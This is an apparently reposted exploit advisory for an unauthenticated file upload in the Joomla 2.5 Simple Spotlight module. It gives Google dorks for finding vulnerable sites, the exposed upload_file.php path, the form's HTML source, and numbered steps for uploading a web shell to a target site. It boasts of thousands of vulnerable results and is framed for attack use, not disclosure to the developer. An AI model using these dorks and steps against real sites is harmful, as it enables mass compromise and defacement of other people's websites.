Joomla 2.5 Modules Simple Spotlight Upload Shell [Old 3xploi7]
#- Title: Joomla 2.5 Modules Simple Spotlight Upload Shell
#- Author: BL4ckc0d1n6
#- Published : 3-22-2012
#- Developer : joomla
#- Link Download : extensions.joomla .org/extension/simple-spotlight
#- Price : Free
#- Google Dork: inurl:/modules/mod_ppc_simple_spotlight/
#- Google Dork: inurl:/modules/mod_ppc_simple_spotlight/
#- Fixed in Version : -
#- Tested on : windows
=======================================================
-- Proof Of Concept --
Description :
Simple spotlight is a jQuery image rotator with navigation. You can have up to 20 images with links. You can turn off the navigation and choose between 27 effects for transition. It also has 5 button styles and a shadow effect.
Vulnerability :
site/path/modules/mod_ppc_simple_spotlight/elements/upload_file.php
site/path/modules/mod_ppc_simple_spotlight/elements/upload_file.php
Result : 13k +
When Vuln :
iSource :
<script language="JavaScript">
function refreshParent() {
window.close();
if (window.opener && !window.opener.closed) {
window.opener.location.reload();
}
}
</script>
<form name="newad" method="post" enctype="multipart/form-data" action="">
<table>
<tr>
<td>
<input type="file" name="image">
</td>
</tr>
<tr>
<td>
<input name="Submit" type="submit" value="Upload image">
<input type="button" value="Close" onclick="javascript: refreshParent()">
</td>
</tr>
</table>
</form>
~ Method ~
1. Site .com
2. add 3xploi7 = /modules/mod_ppc_simple_spotlight/elements/upload_file.php
3. Ex : Site .com/modules/mod_ppc_simple_spotlight/elements/upload_file.php
4. Upload your shell / imges / html file
ABOUT THE AUTHOR
Hello We are OddThemes, Our name came from the fact that we are UNIQUE. We specialize in designing premium looking fully customizable highly responsive blogger templates. We at OddThemes do carry a philosophy that: Nothing Is Impossible
0 komentar:
Posting Komentar